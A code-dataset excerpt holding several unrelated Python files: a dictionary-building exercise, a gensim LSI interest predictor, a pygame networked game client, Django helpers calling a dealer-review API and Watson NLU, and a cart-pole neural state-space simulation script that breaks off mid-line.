{"api_name": "numpy.r_", "line_number": 169, "usage_type": "attribute"}, {"api_name": "numpy.fliplr", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 169, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 196, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.r_", "line_number": 199, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 201, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 201, "usage_type": "attribute"}, {"api_name": "numpy.fft.ifft", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 203, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 213, "usage_type": "call"}, {"api_name": "math.log2", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.stackplot", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 220, "usage_type": "name"}]} +{"seq_id": "621419958", "text": "\"\"\"\nСоздать два списка с различным количеством элементов. В первом должны быть записаны ключи, во втором — значения.\nНеобходимо написать функцию, создающую из данных ключей и значений словарь. Если ключу не хватает значения,\nв словаре для него должно сохраняться значение None. 
Значения, которым не хватило ключей, необходимо отбросить.\n\"\"\"\n\nfrom itertools import zip_longest\n\n\ndef generate_array(pref, size):\n return [f'{pref}_{i}' for i in range(size)]\n\n\ndef main():\n keys = generate_array('key', int(input('введите длину списка ключей:\\n')))\n values = generate_array('values', int(input('введите длину списка значений:\\n')))\n result = {key: value for key, value in zip_longest(keys, values) if key}\n print(f'список ключей:\\n {keys} \\n список значений:\\n {values} \\n получили словарь:\\n {result}')\n\n\nif __name__ == '__main__':\n main()", "sub_path": "Lesson_3/3.py", "file_name": "3.py", "file_ext": "py", "file_size_in_byte": 1218, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "itertools.zip_longest", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "562543631", "text": "#-*-coding:utf-8-*-\n\nfrom __future__ import division\nfrom gensim import corpora,models,similarities\nfrom collections import Counter,defaultdict\nimport codecs\nimport json\n\n#interest_paper_path = 'interest_paper_from_neighbors.json'\ndef extract_paper_for_interest():\n\n with codecs.open(\"t_author_paper.json\",\"r\",\"utf-8\") as fid:\n t_author_paper = json.load(fid)\n\n with codecs.open(\"author_interest.json\",\"r\",\"utf-8\") as fid:\n author_interest = json.load(fid)\n\n interest_paper = {}\n for author,interest_list in author_interest.items():\n for interest in interest_list:\n for paper in t_author_paper[author]:\n interest_paper.setdefault(interest,[]).append(paper)\n\n with codecs.open(\"interest_paper.json\",\"w\",\"utf-8\") as fid:\n json.dump(interest_paper,fid,ensure_ascii=False)\n\n\ndef create_dictionary():\n\n print (\"create dictionary ...\")\n with codecs.open(\"interest_paper.json\",\"r\",\"utf-8\") as fid:\n interest_paper = json.load(fid)\n\n interest_seq = []\n paper_seq = []\n\n for interest,paper in interest_paper.items():\n interest_seq.append(interest)\n text = ' '.join(paper)\n text = clean_data(text)\n paper_seq.append(text)\n #paper_seq = remove_once_appearance(paper_seq,2)\n\n dictionary = corpora.Dictionary(paper_seq)\n corpus = [dictionary.doc2bow(text) for text in paper_seq]\n return (interest_seq,dictionary,corpus)\n\ndef remove_once_appearance(text_list,n):\n frequency = defaultdict(int)\n for text in text_list:\n for token in text:\n frequency[token] += 1\n text_list = [[token for token in text if frequency[token] > n] for text in text_list]\n return text_list\n\ndef clean_data(text):\n\n stop_list = set()#set('a is are on from for and not to that') #this there these those have has been were I you me they can could be do . , : ! ? 
'.split())\n text = [word for word in text.lower().split() if word not in stop_list]\n return text\n\n\n\ndef create_lsi_model(num_topics,dictionary,corpus):\n\n print (\"create lsi model ...\")\n tfidf_model = models.TfidfModel(corpus)\n corpus_tfidf = tfidf_model[corpus]\n lsi_model = models.LsiModel(corpus_tfidf,id2word=dictionary,num_topics = num_topics)\n corpus_lsi = lsi_model[corpus_tfidf]\n corpus_simi_matrix = similarities.MatrixSimilarity(corpus_lsi)\n\n #record_papers_tfidf(corpus_tfidf)\n return (tfidf_model,lsi_model,corpus_simi_matrix)\n\n\ndef record_papers_tfidf(corpus_tfidf):\n print(\"record papers' tfidf ...\")\n fid_result = codecs.open(\"corpus_tfidf_papers\",\"w\",\"utf-8\")\n for token in corpus_tfidf:\n tfidf_list = []\n for v in token:\n tfidf_list.append(str(v[0])+\":\"+str(v[1]))\n fid_result.write('\\t'.join(tfidf_list)+'\\n')\n fid_result.close()\n\n\ndef read_test_data(json_name):\n\n with codecs.open(json_name,\"r\",\"utf-8\") as fid:\n author_paper = json.load(fid)\n\n return author_paper\n\ndef predict_n_interest(author_paper,interest_seq,dictionary,corpus,tfidf_model,lsi_model,corpus_simi_matrix):\n\n print (\"predict interest ...\")\n predict_author_interest = {}\n for author,paper in author_paper.items():\n interest = []\n test_text = clean_data(' '.join(paper))\n test_bow = dictionary.doc2bow(test_text)\n test_tfidf = tfidf_model[test_bow]\n test_lsi = lsi_model[test_tfidf]\n test_simi = corpus_simi_matrix[test_lsi]\n\n result = list(enumerate(test_simi))\n result.sort(key=lambda x:x[1])\n\n for v in result[-10:]:\n interest.append(interest_seq[v[0]])\n interest.extend(['']*(5-len(interest)))\n predict_author_interest.setdefault(author,interest)\n\n with codecs.open(\"p_author_interest_lsi_10.json\",\"w\",\"utf-8\") as fid:\n json.dump(predict_author_interest,fid,ensure_ascii=False)\n\n return predict_author_interest\n\ndef print_validation_result(predict_author_interest,author_list,author_interest,num_topics):\n\n print (len(author_interest.keys()))\n print (len(predict_author_interest.keys()))\n\n with codecs.open(\"result_predict_by_interest_p.txt\",\"a\",\"utf-8\") as fid:\n accuracy = 0\n for author in author_list:\n accuracy = accuracy + (len(set(predict_author_interest[author])&set(author_interest[author])))/3\n #fid.write(author+'\\t'+str(len(set(predict_author_interest[author])&set(author_interest[author])))+'\\n')\n fid.write(str(num_topics)+'\\t'+str(accuracy/6000)+'\\n')\n\ndef print_final_result(predict_author_interest,author_list,author_interest,num_topics):\n\n\n fid_result = codecs.open(\"interst_from_interest_800.txt\",\"w\",\"utf-8\")\n\n with codecs.open(\"validation.txt\",\"r\",\"utf-8\") as fid:\n for line in fid:\n if line == '\\n':\n continue\n author = line.strip()\n fid_result.write(author + '\\t' + '\\t'.join(predict_author_interest[author])+'\\n')\n\n\n\nif __name__ == '__main__':\n #extract_paper_for_interest()\n with codecs.open(\"author_interest.json\",\"r\",\"utf-8\") as fid:\n author_interest = json.load(fid)\n\n author_list = list(author_interest.keys())\n\n vali_data = read_test_data(\"t_author_paper.json\")\n test_data = read_test_data(\"p_author_paper.json\")\n (interest_seq,dictionary,corpus) = create_dictionary()\n\n for num_topics in range(800,860,60):\n (tfidf_model,lsi_model,corpus_simi_matrix) = create_lsi_model(num_topics,dictionary,corpus)\n predict_author_interest = predict_n_interest(test_data,interest_seq,dictionary,corpus,tfidf_model,lsi_model,corpus_simi_matrix)\n 
 +{"seq_id": "267714064", "text": "import pygame\nfrom textbox import TextBox\nimport sys\nimport socket\nfrom threading import Thread\nfrom Protocol import Protocol\nfrom physics import Ball\nfrom pygame.color import THECOLORS\n\nsize = width, height = 640, 480  # set the window size\nscreen = pygame.display.set_mode(size)  # create the display window\nADDRESS = ('127.0.0.1', 8712)  # ('foxyball.cn', 8712)  # if the server runs on this machine, use ('127.0.0.1', 8712)\ng_client = socket.socket()  # create the socket object\nothers = []\nmy = Ball(100,100,0,0,\"why\")\ndef init():\n    global my  # rebind the module-level player instead of shadowing it with a local\n    pygame.init()  # initialize pygame\n    # connect to the server\n    g_client.connect(ADDRESS)\n    # start receiving messages from the server\n    thread = Thread(target=msg_handler)\n    thread.setDaemon(True)\n    thread.start()\n    my = Ball(100,100,0,0,\"why\")\n    # tell the server that a new player has joined\n    send_new_role()\n    return\ndef loop():\n    while True:  # main loop keeps the window alive\n        pygame.time.delay(32)\n        my.move()\n        for event in pygame.event.get():  # iterate over all pending events\n            if event.type == pygame.QUIT:\n                sys.exit()\n            if event.type == pygame.KEYDOWN:\n                if event.key == pygame.K_a:\n                    my.vx = -2\n                if event.key == pygame.K_d:\n                    my.vx = 2\n                if event.key == pygame.K_SPACE:\n                    my.jump()\n                send_role_move()  # tell the server that we moved\n            if event.type == pygame.KEYUP:\n                my.stop()\n        screen.fill((255,255,255))\n        pygame.draw.circle(screen,THECOLORS[\"red\"],[my.x,my.y],10,0)\n        for r in others:\n            pygame.draw.circle(screen,THECOLORS[\"red\"],[r.x,r.y],10,0)\n        pygame.display.flip()\ndef send_new_role():\n    p = Protocol()\n    p.add_str(\"newrole\")\n    p.add_int32(my.x)\n    p.add_int32(my.y)\n    p.add_str(my.name)\n    data = p.get_pck_has_head()\n    # send the packet\n    g_client.sendall(data)\ndef send_role_move():\n    \"\"\"\n    Send this player's coordinates to the server\n    \"\"\"\n    # build the packet\n    p = Protocol()\n    p.add_str(\"move\")\n    p.add_int32(my.x)\n    p.add_int32(my.y)\n    data = p.get_pck_has_head()\n    # send the packet\n    g_client.sendall(data)\ndef pck_handler(pck):\n    p = Protocol(pck)\n    pck_type = p.get_str()\n    if pck_type == 'playermove':  # a player-move packet\n        x = p.get_int32()\n        y = p.get_int32()\n        name = p.get_str()\n        for r in others:\n            if r.name == name:\n                r.x = x\n                r.y = y\n                break\n    elif pck_type == 'newplayer':  # a new-player packet\n        x = p.get_int32()\n        y = p.get_int32()\n        name = p.get_str()\n        r = Ball(x, y, 0, 0, name)\n        others.append(r)\n    elif pck_type == 'logout':  # a player disconnected\n        name = p.get_str()\n        for r in others:\n            if r.name == name:\n                others.remove(r)\n                break\ndef msg_handler():\n    \"\"\"\n    Handle messages returned by the server\n    \"\"\"\n    while True:\n        bytes = g_client.recv(1024)\n        # split the byte stream into packets by their length prefix\n        while True:\n            # read the packet length\n            length_pck = int.from_bytes(bytes[:4], byteorder='little')\n            # slice out the packet body\n            pck = bytes[4:4 + length_pck]\n            # drop the bytes that were already consumed\n            bytes = bytes[4 + length_pck:]\n            # hand the packet to the handler\n            pck_handler(pck)\n            # if no bytes remain, leave the loop\n            if len(bytes) == 0:\n                break\n\nif __name__ == '__main__':\n    init()\n    loop()\n    pygame.quit()", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3608, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pygame.display.set_mode", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 11, "usage_type": "attribute"}, {"api_name": "socket.socket", "line_number": 13, "usage_type": "call"}, {"api_name": "physics.Ball", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.init", "line_number": 17, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 21, "usage_type": "call"}, {"api_name": "physics.Ball", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.time.delay", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 33, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.color.THECOLORS", "line_number": 46, "usage_type": "name"}, {"api_name": "pygame.draw.circle", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.color.THECOLORS", "line_number": 48, "usage_type": "name"}, {"api_name": "pygame.display.flip", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 49, "usage_type": "attribute"}, {"api_name": "Protocol.Protocol", "line_number": 51, "usage_type": "call"}, {"api_name": "Protocol.Protocol", "line_number": 64, "usage_type": "call"}, {"api_name": "Protocol.Protocol", "line_number": 72, "usage_type": "call"}, {"api_name": "physics.Ball", "line_number": 87, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 118, "usage_type": "call"}]}
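Editor's aside: main.py above assumes every packet is preceded by a 4-byte little-endian length header, the convention its msg_handler slices on. A minimal round-trip sketch of that framing (the frame helper is illustrative, not from the record; a production reader would also buffer partial recv() chunks):

def frame(payload: bytes) -> bytes:
    # prepend a 4-byte little-endian length header
    return len(payload).to_bytes(4, 'little') + payload

buf = frame(b'newrole') + frame(b'move')
while buf:
    length = int.from_bytes(buf[:4], byteorder='little')
    pck, buf = buf[4:4 + length], buf[4 + length:]
    print(pck)   # b'newrole', then b'move'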
"pygame.display", "line_number": 49, "usage_type": "attribute"}, {"api_name": "Protocol.Protocol", "line_number": 51, "usage_type": "call"}, {"api_name": "Protocol.Protocol", "line_number": 64, "usage_type": "call"}, {"api_name": "Protocol.Protocol", "line_number": 72, "usage_type": "call"}, {"api_name": "physics.Ball", "line_number": 87, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 118, "usage_type": "call"}]} +{"seq_id": "305336408", "text": "import requests\nimport json\nfrom .models import CarDealer, CarReview\nfrom requests.auth import HTTPBasicAuth\n\n\n# https://realpython.com/python-kwargs-and-args/\n\n#\ndef get_request(url, **kwargs):\n print(kwargs)\n print(\"GET from {} \".format(url))\n try:\n # Call get method of requests library with URL and parameters\n # response = requests.get(url, headers={'Content-Type': 'application/json'},params=kwargs)\n if 'api_key' in kwargs:\n # Basic authentication GET\n response = requests.get(url, headers={'Content-Type': 'application/json'}, params=kwargs,\n auth=HTTPBasicAuth('apikey', kwargs['api_key']))\n else:\n # no authentication GET\n response = requests.get(url, headers={'Content-Type': 'application/json'}, params=kwargs)\n except:\n # If any error occurs\n print(\"Network exception occurred\")\n status_code = response.status_code\n print(\"With status {} \".format(status_code))\n json_data = json.loads(response.text)\n return json_data\n\n\n# WASON NLU SERVICE\nfrom ibm_watson import NaturalLanguageUnderstandingV1\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\nfrom ibm_watson.natural_language_understanding_v1 import Features, EntitiesOptions, KeywordsOptions\n\n\ndef analyze_review_sentiments(dealerreview):\n api_key = API_KEY\n url = URL_NLU\n #\n authenticator = IAMAuthenticator(api_key)\n natural_language_understanding = NaturalLanguageUnderstandingV1(\n version='2021-03-25',\n authenticator=authenticator)\n\n natural_language_understanding.set_service_url(url)\n response = natural_language_understanding.analyze(\n text=dealerreview,\n features=Features(\n entities=EntitiesOptions(emotion=True, sentiment=True, limit=2),\n keywords=KeywordsOptions(emotion=True, sentiment=True,\n limit=2))).get_result()\n # print(json.dumps(response, indent=2))\n #\n try:\n resultado = response['keywords'][0]['sentiment']['label']\n except:\n resultado = 'neutral'\n return resultado\n\n\n#\ndef get_dealers_from_cf(url, **kwargs):\n results = []\n # Call get_request with a URL parameter\n json_result = get_request(url)\n # print(json_result)\n if json_result:\n # Get the row list in JSON as dealers\n dealers = json_result[\"rows\"]\n # For each dealer object\n for dealer in dealers:\n # Get its content in `doc` object\n # dealer_doc = dealer[\"doc\"]\n print(dealer)\n dealer_doc = dealer\n # Create a CarDealer object with values in `doc` object\n dealer_obj = CarDealer(city=dealer_doc[\"city\"],\n address=dealer_doc[\"address\"], full_name=dealer_doc[\"full_name\"],\n short_name=dealer_doc[\"short_name\"],\n id=dealer_doc[\"id\"], lat=dealer_doc[\"lat\"], long=dealer_doc[\"long\"],\n st=dealer_doc[\"st\"], zip=dealer_doc[\"zip\"])\n # address=dealer_doc[\"address\"], full_name=dealer_doc[\"full_name\"],short_name=dealer_doc[\"short_name\"],\n results.append(dealer_obj)\n return results\n\n\n# get dealer reviews\ndef get_dealers_reviews_from_cf(url, **kwargs):\n # Call get_request with a URL parameter\n results = []\n dealer_id = kwargs['dealer_id']\n # json_result = get_request(url,dealer_id=dealer_id) 
\n\n# WATSON NLU SERVICE\nfrom ibm_watson import NaturalLanguageUnderstandingV1\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\nfrom ibm_watson.natural_language_understanding_v1 import Features, EntitiesOptions, KeywordsOptions\n\n\ndef analyze_review_sentiments(dealerreview):\n    api_key = API_KEY\n    url = URL_NLU\n    #\n    authenticator = IAMAuthenticator(api_key)\n    natural_language_understanding = NaturalLanguageUnderstandingV1(\n        version='2021-03-25',\n        authenticator=authenticator)\n\n    natural_language_understanding.set_service_url(url)\n    response = natural_language_understanding.analyze(\n        text=dealerreview,\n        features=Features(\n            entities=EntitiesOptions(emotion=True, sentiment=True, limit=2),\n            keywords=KeywordsOptions(emotion=True, sentiment=True,\n                                     limit=2))).get_result()\n    # print(json.dumps(response, indent=2))\n    #\n    try:\n        resultado = response['keywords'][0]['sentiment']['label']\n    except:\n        resultado = 'neutral'\n    return resultado\n\n\n#\ndef get_dealers_from_cf(url, **kwargs):\n    results = []\n    # Call get_request with a URL parameter\n    json_result = get_request(url)\n    # print(json_result)\n    if json_result:\n        # Get the row list in JSON as dealers\n        dealers = json_result[\"rows\"]\n        # For each dealer object\n        for dealer in dealers:\n            # Get its content in `doc` object\n            # dealer_doc = dealer[\"doc\"]\n            print(dealer)\n            dealer_doc = dealer\n            # Create a CarDealer object with values in `doc` object\n            dealer_obj = CarDealer(city=dealer_doc[\"city\"],\n                                   address=dealer_doc[\"address\"], full_name=dealer_doc[\"full_name\"],\n                                   short_name=dealer_doc[\"short_name\"],\n                                   id=dealer_doc[\"id\"], lat=dealer_doc[\"lat\"], long=dealer_doc[\"long\"],\n                                   st=dealer_doc[\"st\"], zip=dealer_doc[\"zip\"])\n            # address=dealer_doc[\"address\"], full_name=dealer_doc[\"full_name\"],short_name=dealer_doc[\"short_name\"],\n            results.append(dealer_obj)\n    return results\n\n\n# get dealer reviews\ndef get_dealers_reviews_from_cf(url, **kwargs):\n    # Call get_request with a URL parameter\n    results = []\n    dealer_id = kwargs['dealer_id']\n    # json_result = get_request(url,dealer_id=dealer_id) ###############\n    url = 'https://0f2f6a44.us-south.apigw.appdomain.cloud/reviews/review'\n    data = {\"dealerid\": dealer_id}\n    response = requests.get(url, json=data)\n    json_result = json.loads(response.text)\n    # print(json_result)\n    if json_result:\n        # Get the row list in JSON as dealers\n        dealers = json_result[\"rows\"]\n        # For each dealer object\n        for dealer in dealers:\n            # Get its content in `doc` object\n            # dealer_doc = dealer[\"doc\"]\n            dealer_doc = dealer\n            #\n            sentiment = analyze_review_sentiments(dealer_doc['review'])\n            # sentiment = 'negative'\n            # Create a CarReview object with values in `doc` object\n            dealer_obj = CarReview(dealership=dealer_doc[\"dealership\"],\n                                   name=dealer_doc[\"name\"],\n                                   purchase=dealer_doc[\"purchase\"],\n                                   id=dealer_doc[\"id\"],\n                                   review=dealer_doc[\"review\"],\n                                   purchase_date=\"\", #\n                                   car_make=dealer_doc[\"car_make\"],\n                                   car_model=dealer_doc[\"car_model\"],\n                                   car_year=dealer_doc[\"car_year\"],\n                                   sentiment=sentiment)\n            results.append(dealer_obj)\n    return results\n\n# POST\ndef post_request(url, json_payload, **kwargs):\n    requests.post(url, json=json_payload)\n    return\n\n\nimport datetime\nfrom .models import CarModel, CarMake\n\n\n# load seed data (car makes and models)\ndef cargarDatos(request):\n    marcas = ['Audi', 'Subaru', 'Honda']\n    modelos = ['s1', 'a1', 'w20', 'h2']\n    anios = [datetime.datetime.now().year, datetime.datetime.now().year]\n    for i in range(1, 50):\n        dealerid = i\n        #\n        m = CarMake(name=marcas[0])\n        m.save()\n        CarModel.objects.create(model_id=m.id, dealer_id=i, name=modelos[0], year='2019-01-01')\n        CarModel.objects.create(model_id=m.id, dealer_id=i, name=modelos[1], year='2014-01-01')\n        #\n        m = CarMake(name=marcas[1])\n        m.save()\n        CarModel.objects.create(model_id=m.id, dealer_id=i, name=modelos[0], year='2019-01-01')\n        CarModel.objects.create(model_id=m.id, dealer_id=i, name=modelos[1], year='2015-01-01')\n        #\n        m = CarMake(name=marcas[2])\n        m.save()\n        CarModel.objects.create(model_id=m.id, dealer_id=i, name=modelos[0], year='2019-01-01')\n        CarModel.objects.create(model_id=m.id, dealer_id=i, name=modelos[1], year='2017-01-01')\n    return\n\n\n\n\n# NLU\nAPI_KEY = '**********'\nURL_NLU = '**********'\n", "sub_path": "server/djangoapp/restapis.py", "file_name": "restapis.py", "file_ext": "py", "file_size_in_byte": 6164, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "requests.get", "line_number": 18, "usage_type": "call"}, {"api_name": "requests.auth.HTTPBasicAuth", "line_number": 19, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 22, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 28, "usage_type": "call"}, {"api_name": "ibm_cloud_sdk_core.authenticators.IAMAuthenticator", "line_number": 42, "usage_type": "call"}, {"api_name": "ibm_watson.NaturalLanguageUnderstandingV1", "line_number": 43, "usage_type": "call"}, {"api_name": "ibm_watson.natural_language_understanding_v1.Features", "line_number": 50, "usage_type": "call"}, {"api_name": "ibm_watson.natural_language_understanding_v1.EntitiesOptions", "line_number": 51, "usage_type": "call"}, {"api_name": "ibm_watson.natural_language_understanding_v1.KeywordsOptions", "line_number": 52, "usage_type": "call"}, {"api_name": "models.CarDealer", "line_number": 79, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 97, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 98, "usage_type": "call"}, {"api_name": "models.CarReview", "line_number": 112, "usage_type": "call"}, {"api_name": 
"requests.post", "line_number": 127, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 139, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 139, "usage_type": "attribute"}, {"api_name": "models.CarMake", "line_number": 143, "usage_type": "call"}, {"api_name": "models.CarModel.objects.create", "line_number": 145, "usage_type": "call"}, {"api_name": "models.CarModel.objects", "line_number": 145, "usage_type": "attribute"}, {"api_name": "models.CarModel", "line_number": 145, "usage_type": "name"}, {"api_name": "models.CarModel.objects.create", "line_number": 146, "usage_type": "call"}, {"api_name": "models.CarModel.objects", "line_number": 146, "usage_type": "attribute"}, {"api_name": "models.CarModel", "line_number": 146, "usage_type": "name"}, {"api_name": "models.CarMake", "line_number": 148, "usage_type": "call"}, {"api_name": "models.CarModel.objects.create", "line_number": 150, "usage_type": "call"}, {"api_name": "models.CarModel.objects", "line_number": 150, "usage_type": "attribute"}, {"api_name": "models.CarModel", "line_number": 150, "usage_type": "name"}, {"api_name": "models.CarModel.objects.create", "line_number": 151, "usage_type": "call"}, {"api_name": "models.CarModel.objects", "line_number": 151, "usage_type": "attribute"}, {"api_name": "models.CarModel", "line_number": 151, "usage_type": "name"}, {"api_name": "models.CarMake", "line_number": 153, "usage_type": "call"}, {"api_name": "models.CarModel.objects.create", "line_number": 155, "usage_type": "call"}, {"api_name": "models.CarModel.objects", "line_number": 155, "usage_type": "attribute"}, {"api_name": "models.CarModel", "line_number": 155, "usage_type": "name"}, {"api_name": "models.CarModel.objects.create", "line_number": 156, "usage_type": "call"}, {"api_name": "models.CarModel.objects", "line_number": 156, "usage_type": "attribute"}, {"api_name": "models.CarModel", "line_number": 156, "usage_type": "name"}]} +{"seq_id": "335960634", "text": "import os\nimport pandas as pd\nimport numpy as np\nimport torch\nimport matplotlib.pyplot as plt\nimport sys\nsys.path.append(os.path.join(\"..\"))\nfrom torchid.ssfitter import NeuralStateSpaceSimulator\nfrom torchid.ssmodels import CartPoleStateSpaceModel\n\n\nif __name__ == '__main__':\n\n plt.close(\"all\")\n COL_T = ['time']\n COL_Y = ['p_meas', 'theta_meas']\n COL_X = ['p', 'v', 'theta', 'omega']\n COL_U = ['u']\n COL_R = ['r']\n df_X = pd.read_csv(os.path.join(\"data\", \"pendulum_data_MPC.csv\"))\n\n\n std_noise_p = 0.01\n std_noise_phi = 0.002\n std_noise = np.array([std_noise_p, std_noise_phi])\n\n t = np.array(df_X[COL_T], dtype=np.float32)\n x = np.array(df_X[COL_X],dtype=np.float32)\n y = np.array(df_X[COL_Y],dtype=np.float32)\n y = np.copy(x[:, [0, 2]])\n u = np.array(df_X[COL_R],dtype=np.float32)\n Ts = t[1] - t[0]\n n_x = x.shape[-1]\n\n x0_torch = torch.from_numpy(x[0,:])\n# x_noise = np.copy(x) + np.random.randn(*x.shape)*std_noise\n# x_noise = x_noise.astype(np.float32)\n y_noise = np.copy(y) + np.random.randn(*y.shape)*std_noise\n y_noise = y_noise.astype(np.float32)\n\n # In[Load model] \n ss_model = CartPoleStateSpaceModel(Ts)\n nn_solution = NeuralStateSpaceSimulator(ss_model)\n #model_name = \"model_OE_minibatch_100.pkl\" \n model_name = \"model_ARX_FE_ref_nonoise.pkl\"\n nn_solution.ss_model.load_state_dict(torch.load(os.path.join(\"models\", model_name)))\n \n # In[Simulation plot]\n \n x_torch = torch.tensor(x)\n x0_torch = torch.tensor(x[0,:])\n u_torch = torch.tensor(u)\n t_torch = torch.tensor(t)\n 
with torch.no_grad():\n        x_sim_torch = nn_solution.f_sim(x0_torch, u_torch)\n        loss = torch.mean(torch.abs(x_sim_torch - x_torch))\n\n    x_sim = np.array(x_sim_torch)\n\n    n_plot = t.size\n    fig,ax = plt.subplots(3,1,sharex=True)\n    ax[0].plot(t[:n_plot], x[:n_plot, 0], label='True')\n    ax[0].plot(t[:n_plot], x_sim[:n_plot, 0], label='Simulated')\n    ax[0].set_xlabel(\"Time (s)\")\n    ax[0].set_ylabel(\"Cart position (m)\")\n    ax[0].legend()\n    ax[0].grid()\n\n    ax[1].plot(t[:n_plot], x[:n_plot, 2], label='True')\n    ax[1].plot(t[:n_plot], x_sim[:n_plot, 2], label='Simulated')\n    ax[1].set_xlabel(\"Time (s)\")\n    ax[1].set_ylabel(\"Pendulum angle (rad)\")\n    ax[1].legend()\n    ax[1].grid()\n\n    ax[2].plot(t[:n_plot], u[:n_plot, 0])\n    ax[2].set_xlabel(\"Time (s)\")\n    ax[2].set_ylabel(\"Input Force (V)\")\n    #ax[2].legend()\n    ax[2].grid()\n\n\n    # In[Generate batches]\n    len_sim = x.shape[0]\n    seq_len = 100\n    dist_sim = 100\n\n    s = np.arange(0, len_sim - seq_len, dist_sim, dtype=int)  # np.int is deprecated in modern NumPy; plain int is equivalent\n    batch_size = len(s)\n    batch_x0 = x_torch[s, :]  # (M, D)\n    batch_t = torch.stack([t_torch[s[i]:s[i] + seq_len] for i in range(batch_size)], dim=0)\n    batch_x = torch.stack([x_torch[s[i]:s[i] + seq_len] for i in range(batch_size)], dim=0)\n    batch_u = torch.stack([u_torch[s[i]:s[i] + seq_len] for i in range(batch_size)], dim=0)\n\n    # In[ZOH baseline performance]\n    #zoh_error = batch_x -batch_x0.view(batch_size,1,n_x)\n    #scale_error = torch.sqrt(torch.mean(zoh_error**2,(0,1)))\n\n    # In[Predictor performance]\n\n    batch_x_pred = nn_solution.f_sim_multistep(batch_x0, batch_u)\n    batch_x_np = batch_x_pred.clone().data.cpu().numpy()\n    batch_t_np = batch_t.clone().data.cpu().numpy()\n    #err = batch_x[:,1:,:] - batch_x_pred[:,1:,:]\n    #err_scaled = err * scale_error\n    #loss = torch.mean(err_scaled**2)\n\n    # In[Performance plot]\n\n\n    fig,ax = plt.subplots(4,1,figsize=(20,10), sharex=True)\n    ax[0].plot(t[:n_plot], y_noise[:n_plot, 0], 'k', label='Measured')\n    ax[0].plot(batch_t_np[:,:,0].T, batch_x_np[:,:,0].T, 'r', linewidth=3)\n    ax[0].set_xlabel(\"Time (s)\")\n    ax[0].set_ylabel(\"Position p (m)\")\n    ax[0].legend()\n    ax[0].grid()\n\n    ax[1].plot(t[:n_plot], x[:n_plot, 1], label='True')\n    ax[1].plot(batch_t_np[:,:,0].T, batch_x_np[:,:,1].T, 'r',linewidth=3)\n    ax[1].set_xlabel(\"Time (s)\")\n    ax[1].set_ylabel(\"Speed v (m/s)\")\n    ax[1].legend()\n    ax[1].grid()\n\n    ax[2].plot(t[:n_plot], y_noise[:n_plot, 1], 'k', label='Measured')\n    ax[2].plot(batch_t_np[:,:,0].T, batch_x_np[:,:,2].T, 'r',linewidth=3)\n    ax[2].plot(t[:n_plot], x[:n_plot, 2], label='True')\n    ax[2].set_xlabel(\"Time (s)\")\n    ax[2].set_ylabel(\"Angle $\\phi$ (rad)\")\n    ax[2].legend()\n    ax[2].grid()\n\n    ax[3].plot(t[:n_plot], x[:n_plot, 3], label='True')\n    ax[3].plot(batch_t_np[:,:,0].T, batch_x_np[:,:,3].T, 'r',linewidth=3)\n    ax[3].set_xlabel(\"Time (s)\")\n    ax[3].set_ylabel(\"Angular velocity $\\omega$ (rad/s)\")\n    ax[3].legend()\n    ax[3].grid()\n\n    # In[Kalman filter setup]\n    n_x = 4\n    n_u = 1\n    VAR = []\n    for idx_var in range(n_x):\n        var = np.zeros((1,n_x)).astype(np.float32)\n       